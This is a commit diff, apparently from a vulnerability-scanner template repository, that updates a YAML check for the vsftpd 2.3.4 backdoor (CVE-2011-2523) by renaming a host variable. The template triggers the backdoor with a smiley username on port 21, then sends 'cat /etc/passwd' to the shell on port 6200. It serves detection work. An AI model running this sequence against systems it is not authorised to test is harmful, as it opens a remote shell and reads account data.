Update CVE-2011-2523.yaml (#6975)
parent
93ec5c4f90
commit
4d524fd178
|
@ -21,19 +21,18 @@ info:
|
||||||
variables:
|
variables:
|
||||||
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
||||||
|
|
||||||
|
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "USER letmein:)\r\nPASS please\r\n"
|
- data: "USER letmein:)\r\nPASS please\r\n"
|
||||||
read: 100
|
read: 100
|
||||||
host:
|
host:
|
||||||
- "{{Hostname}}:21"
|
- "{{Host}}:21"
|
||||||
|
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "{{cmd}}\n"
|
- data: "{{cmd}}\n"
|
||||||
read: 100
|
read: 100
|
||||||
host:
|
host:
|
||||||
- "{{Hostname}}:6200"
|
- "{{Host}}:6200"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
Loading…
Reference in New Issue